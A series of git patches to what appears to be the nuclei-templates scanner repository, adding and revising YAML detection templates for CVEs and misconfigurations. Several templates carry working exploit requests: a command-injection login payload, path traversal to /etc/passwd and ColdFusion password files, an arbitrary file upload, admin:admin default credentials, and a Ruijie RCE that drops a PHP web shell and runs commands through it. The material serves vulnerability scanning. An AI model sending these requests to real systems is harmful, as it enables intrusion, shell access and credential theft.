-24,8 +24,8 @@ requests: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" - body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" + body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word words: - - "projectdiscovery.io" # from Base64 decoding payload \ No newline at end of file + - "poc-testing" # from Base64 decoding payload \ No newline at end of file From fe7b7d6d3ff37be6fb3e35f6c01418252d1737d1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 12:39:30 +0000 Subject: [PATCH 108/370] Auto Update README [Sat Feb 27 12:39:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c69dea17d3..b1345de992 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 210 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 628 files**. +**65 directories, 629 files**. From 0781aa3d66e549ab5b6fc491bf14f1bddc32dc58 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:26:57 +0530 Subject: [PATCH 109/370] Adding CVE-2021-3129 --- cves/2021/CVE-2021-3129.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-3129.yaml diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml new file mode 100644 index 0000000000..fa125864bd --- /dev/null +++ b/cves/2021/CVE-2021-3129.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-3129 + +info: + name: Ignition Laravel RCE + author: z3bd + severity: critical + description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + tags: cve,cve2021,laravel,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/_ignition/execute-solution" + + matchers-condition: and + matchers: + - type: status + status: + - 405 + - type: word + words: + - "laravel" + negative: true \ No newline at end of file From 75d0a46221744112d31021f05cc5ac55df68de4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 12:57:22 +0000 Subject: [PATCH 110/370] Auto Update README [Sat Feb 27 12:57:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b1345de992..7b581cead2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 212 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 629 files**. +**65 directories, 630 files**. From d6e5c4df85430d66ef4fe31a034f0a4c90dcfcd4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:27:42 +0530 Subject: [PATCH 111/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index fa125864bd..667e4cdea2 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -20,4 +20,4 @@ requests: - type: word words: - "laravel" - negative: true \ No newline at end of file + negative: true \ No newline at end of file From dcd939ad9784c7b26507ebc3fa9578d8676a6647 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:30:16 +0530 Subject: [PATCH 112/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 667e4cdea2..7b37f15e1b 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -4,7 +4,8 @@ info: name: Ignition Laravel RCE author: z3bd severity: critical - description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce requests: From 705b0d05f342d61d3159c62cf137d7c76b7819d6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:31:48 +0530 Subject: [PATCH 113/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 7b37f15e1b..af09421449 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET - path: + path: - "{{BaseURL}}/_ignition/execute-solution" matchers-condition: and From 7b4257a4e593f0eec014a7a3fcbf4d1064380d92 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 19:56:18 +0530 Subject: [PATCH 114/370] removing duplicate template --- exposed-panels/pi-admin-console.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 exposed-panels/pi-admin-console.yaml diff --git a/exposed-panels/pi-admin-console.yaml b/exposed-panels/pi-admin-console.yaml deleted file mode 100644 index 5d7922521e..0000000000 --- a/exposed-panels/pi-admin-console.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: pi-hole-admin-console - -info: - name: Pi-hole Admin Console - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6626 - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin/index.php?login' - - matchers-condition: and - matchers: - - type: word - words: - - 'Pi-hole Admin Console' - - type: status - status: - - 200 From 6307534c26cb1b0536a187656aa693adf2ef5c79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 14:27:24 +0000 Subject: [PATCH 115/370] Auto Update README [Sat Feb 27 14:27:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b1345de992..c472d3a0e0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 211 | vulnerabilities | 102 | exposed-panels | 86 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 629 files**. +**65 directories, 635 files**. From 6cb87158a7f4c61d3f80ef9fa562c24ea0067064 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 23:54:39 +0530 Subject: [PATCH 116/370] improved matcher --- cves/2021/CVE-2021-3129.yaml | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index af09421449..76e15b0e43 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -9,16 +9,19 @@ info: tags: cve,cve2021,laravel,rce requests: - - method: GET - path: - - "{{BaseURL}}/_ignition/execute-solution" + - raw: + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}} - matchers-condition: and matchers: - - type: status - status: - - 405 - type: word words: - - "laravel" - negative: true \ No newline at end of file + - "failed to open stream: Permission denied" \ No newline at end of file From 530658c9da079ff0ab03f3c6eb307ccc8eef65d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 23:56:53 +0530 Subject: [PATCH 117/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 76e15b0e43..9b4c249733 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -8,6 +8,8 @@ info: reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce + # Note:- This is detection template, use the referenced article for detailed exploit. + requests: - raw: - | From c74ca010d145f3914957e516bca3a0522a32c506 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 18:29:18 +0000 Subject: [PATCH 118/370] Auto Update README [Sat Feb 27 18:29:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c472d3a0e0..ce1d659d86 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 86 | +| cves | 212 | vulnerabilities | 102 | exposed-panels | 86 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 635 files**. +**65 directories, 636 files**. From b39230ec86e7c0b280002f5748596f6cb7652d82 Mon Sep 17 00:00:00 2001 From: savik Date: Sat, 27 Feb 2021 20:37:04 +0200 Subject: [PATCH 119/370] Update vbulletin-workflow.yaml --- workflows/vbulletin-workflow.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index 2b15e1589d..0042ac8e58 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -17,6 +17,5 @@ workflows: - name: vbulletin subtemplates: - template: cves/2019/CVE-2019-16759.yaml - - template: cves/2019/CVE-2019-16759-1.yaml - template: cves/2019/CVE-2019-6340.yaml - - template: cves/2020/CVE-2020-12720.yaml \ No newline at end of file + - template: cves/2020/CVE-2020-12720.yaml From 998216b8c0891f3a3d5f6d743c083bf2dc0c4d5e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 1 Mar 2021 07:32:59 +0700 Subject: [PATCH 120/370] :fire: Add CVE-2021-3378 --- cves/2021/CVE-2021-3378.yaml | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2021/CVE-2021-3378.yaml diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml new file mode 100644 index 0000000000..39a334d8f2 --- /dev/null +++ b/cves/2021/CVE-2021-3378.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-3378 + +info: + name: FortiLogger Unauthenticated Arbitrary File Upload + author: dwisiswant0 + severity: critical + reference: https://erberkan.github.io/2021/cve-2021-3378/ + description: | + This template detects an unauthenticated arbitrary file upload + via insecure POST request. It has been tested on version 4.4.2.2 in + Windows 10 Enterprise. + tags: cve,cve2021,fortilogger,fortigate,fortinet + +requests: + - method: POST + path: + - "{{BaseURL}}/shared/GetProductInfo" + body: "" + headers: + Accept: "application/json, text/javascript, */*; q=0.01" + Accept-Language: "en-US,en;q=0.5" + Accept-Encoding: "gzip, deflate" + X-Requested-With: "XMLHttpRequest" + matchers: + - type: status + status: + - 200 + - type: word + words: + - "4.4.2.2" + part: body + - type: word + words: + - "application/json" + - "ASP.NET" + condition: and + part: header \ No newline at end of file From bb60b70454e0f1c2cd6413c7b4e093cb2b834cf7 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 1 Mar 2021 07:33:25 +0700 Subject: [PATCH 121/370] :hammer: Add missing matchers-condition --- cves/2021/CVE-2021-3378.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 39a334d8f2..3dc3c76944 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -21,6 +21,7 @@ requests: Accept-Language: "en-US,en;q=0.5" Accept-Encoding: "gzip, deflate" X-Requested-With: "XMLHttpRequest" + matchers-condition: and matchers: - type: status status: From 7988fe96cb27838d0b1ca751d94d35912a954e63 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 01:13:23 +0000 Subject: [PATCH 122/370] Create frp-default-credentials.yaml --- .../frps/frp-default-credentials.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/frps/frp-default-credentials.yaml diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml new file mode 100644 index 0000000000..0da028260c --- /dev/null +++ b/default-logins/frps/frp-default-credentials.yaml @@ -0,0 +1,27 @@ +id: frp-default-credentials + +info: + name: Frp Default credentials + author: pikpikcu + severity: info + tags: frp,dlogin + +requests: + - method: GET + path: + - "{{BaseURL}}/api/proxy/tcp" + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + + matchers-condition: and + matchers: + + - type: word + words: + - "proxies" + part: body + condition: and + + - type: status + status: + - 200 From 5816bd59bffb41b728f440d3989a9340e517ef4b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 01:24:26 +0000 Subject: [PATCH 123/370] Create frp-unauthenticated.yaml --- misconfiguration/frp-unauthenticated.yaml | 27 +++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/frp-unauthenticated.yaml diff --git a/misconfiguration/frp-unauthenticated.yaml b/misconfiguration/frp-unauthenticated.yaml new file mode 100644 index 0000000000..4b7e2cc147 --- /dev/null +++ b/misconfiguration/frp-unauthenticated.yaml @@ -0,0 +1,27 @@ +id: frp-unauthenticated + +info: + name: Frp Unauthenticated + author: pikpikcu + severity: info + tags: frp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/proxy/tcp" + - "{{BaseURL}}/static/" + + matchers-condition: and + matchers: + + - type: word + words: + - "proxies" + - "frps dashboard" + part: body + condition: and + + - type: status + status: + - 200 From 5c24e187632249fc67a2863405b3117a0369ae6c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 04:26:27 +0000 Subject: [PATCH 124/370] Create CVE-2010-2861.yaml --- cves/2010/CVE-2010-2861.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2861.yaml diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml new file mode 100644 index 0000000000..5baeae6b66 --- /dev/null +++ b/cves/2010/CVE-2010-2861.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2861 + +info: + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI + author: pikpikcu + severity: high + reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 + tags: cve,cve2010,coldfusion,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" + + matchers-condition: and + matchers: + + - type: word + words: + - "rdspassword=" + - "encrypted=" + part: body + condition: and + + - type: status + status: + - 200 From c55692e01c9ec2a55b402ffe3f8ba500fef90bfd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 06:56:46 +0000 Subject: [PATCH 125/370] Create ruijie-networks-rce.yaml --- .../other/ruijie-networks-rce.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/other/ruijie-networks-rce.yaml diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml new file mode 100644 index 0000000000..dd7fa03dc6 --- /dev/null +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -0,0 +1,39 @@ +id: ruijie-networks-rce + +info: + name: Ruijie Networks RCE + author: pikpikcu + severity: critical + reference: https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + tags: ruijie,rce + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Content-Length: 111 + + ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 + + + - | + GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - "nobody:x:0:0:" + part: body + + - type: status + status: + - 200 From 4a4c9c34370ef4f798d6ba6e9e58a22e017ee488 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 12:27:18 +0530 Subject: [PATCH 126/370] misc update --- cves/2021/CVE-2021-21972.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 788aed0526..247b881f6d 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -1,7 +1,7 @@ id: CVE-2021-21972 info: - name: VMware vCenter Unauthorized RCE + name: VMware vCenter Unauthenticated RCE author: dwisiswant0 severity: critical reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ From 7ec42cf499c5954ac554a3cf8a96005fbe853e0c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 06:57:32 +0000 Subject: [PATCH 127/370] Update ruijie-networks-rce.yaml --- vulnerabilities/other/ruijie-networks-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index dd7fa03dc6..20f0c26d52 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -18,7 +18,6 @@ requests: ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - - | GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} From f0e0bcfd048cc1c4e104c88ce63d06aeb6f714e3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 12:50:00 +0530 Subject: [PATCH 128/370] Update CVE-2021-3378.yaml --- cves/2021/CVE-2021-3378.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 3dc3c76944..fd8663fbfa 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -19,7 +19,7 @@ requests: headers: Accept: "application/json, text/javascript, */*; q=0.01" Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "gzip, deflate" + Accept-Encoding: "deflate" X-Requested-With: "XMLHttpRequest" matchers-condition: and matchers: From f8fba8d797d88bfb3099d97d7bb14cda501e9669 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:04:47 +0530 Subject: [PATCH 129/370] Update frp-default-credentials.yaml --- default-logins/frps/frp-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index 0da028260c..546d46d91d 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -11,7 +11,7 @@ requests: path: - "{{BaseURL}}/api/proxy/tcp" headers: - Authorization: "Basic YWRtaW46YWRtaW4=" + Authorization: "Basic YWRtaW46YWRtaW4=" matchers-condition: and matchers: From 4666c0844f6f7226f143178de4b021002c10de49 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:15:12 +0530 Subject: [PATCH 130/370] misc changes --- default-logins/frps/frp-default-credentials.yaml | 1 + .../unauthenticated-frp.yaml | 5 +++-- 2 files changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/frp-unauthenticated.yaml => exposed-panels/unauthenticated-frp.yaml (81%) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index 546d46d91d..fc7dfbebdb 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info tags: frp,dlogin + reference: https://github.com/fatedier/frp/issues/1840 requests: - method: GET diff --git a/misconfiguration/frp-unauthenticated.yaml b/exposed-panels/unauthenticated-frp.yaml similarity index 81% rename from misconfiguration/frp-unauthenticated.yaml rename to exposed-panels/unauthenticated-frp.yaml index 4b7e2cc147..404fbdc719 100644 --- a/misconfiguration/frp-unauthenticated.yaml +++ b/exposed-panels/unauthenticated-frp.yaml @@ -1,10 +1,11 @@ -id: frp-unauthenticated +id: unauthenticated-frp info: - name: Frp Unauthenticated + name: Unauthenticated FRP author: pikpikcu severity: info tags: frp,unauth + link: https://github.com/fatedier/frp/ requests: - method: GET From 631dafc053aa4cd35207e554bce319310f7186bd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:20:35 +0530 Subject: [PATCH 131/370] Update unauthenticated-frp.yaml --- exposed-panels/unauthenticated-frp.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/unauthenticated-frp.yaml b/exposed-panels/unauthenticated-frp.yaml index 404fbdc719..b6bb541ef5 100644 --- a/exposed-panels/unauthenticated-frp.yaml +++ b/exposed-panels/unauthenticated-frp.yaml @@ -10,7 +10,6 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/proxy/tcp" - "{{BaseURL}}/static/" matchers-condition: and @@ -18,10 +17,8 @@ requests: - type: word words: - - "proxies" - "frps dashboard" part: body - condition: and - type: status status: From 2b1df442b57b7f473f452763a92ed551184b1e59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 07:51:28 +0000 Subject: [PATCH 132/370] Auto Update README [Mon Mar 1 07:51:28 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ce1d659d86..4dd81032e2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 212 | vulnerabilities | 102 | exposed-panels | 86 | +| cves | 213 | vulnerabilities | 102 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 23 | miscellaneous | 16 | default-logins | 14 | +| workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 636 files**. +**67 directories, 639 files**. From 4c319fc79f9d615703cec1bdd165ab8edd540e19 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:37:10 +0530 Subject: [PATCH 133/370] Update ruijie-networks-rce.yaml --- vulnerabilities/other/ruijie-networks-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 20f0c26d52..3a7f4ecb64 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -1,10 +1,11 @@ id: ruijie-networks-rce info: - name: Ruijie Networks RCE + name: Ruijie Networks-EWEB Network Management System RCE author: pikpikcu severity: critical reference: https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + vendor: https://www.ruijienetworks.com tags: ruijie,rce requests: From aaafd037667fe66887d336a7f41e11a410c41996 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 08:09:17 +0000 Subject: [PATCH 134/370] Auto Update README [Mon Mar 1 08:09:17 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4dd81032e2..bafd247be0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 213 | vulnerabilities | 102 | exposed-panels | 87 | +| cves | 213 | vulnerabilities | 103 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 639 files**. +**67 directories, 640 files**. From bea2bfee01bf7b90361126832c3110e28d72f0a0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:15:16 +0530 Subject: [PATCH 135/370] Added complete poc --- cves/2021/CVE-2021-3378.yaml | 36 +++++++++++++++++++++++++----------- 1 file changed, 25 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index fd8663fbfa..4829a293a3 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -12,15 +12,28 @@ info: tags: cve,cve2021,fortilogger,fortigate,fortinet requests: - - method: POST - path: - - "{{BaseURL}}/shared/GetProductInfo" - body: "" - headers: - Accept: "application/json, text/javascript, */*; q=0.01" - Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "deflate" - X-Requested-With: "XMLHttpRequest" + - raw: + - | + POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: application/json + Referer: {{BaseURL}} + Connection: close + X-Requested-With: XMLHttpRequest + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="file"; filename="poc.txt" + Content-Type: imnage/png + + POC_TEST + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + + - | + GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: status @@ -28,11 +41,12 @@ requests: - 200 - type: word words: - - "4.4.2.2" + - "POC_TEST" part: body + - type: word words: - - "application/json" + - "text/plain" - "ASP.NET" condition: and part: header \ No newline at end of file From c509e03c71233499dc35af80b58b66e4709fe9ff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 08:51:05 +0000 Subject: [PATCH 136/370] Auto 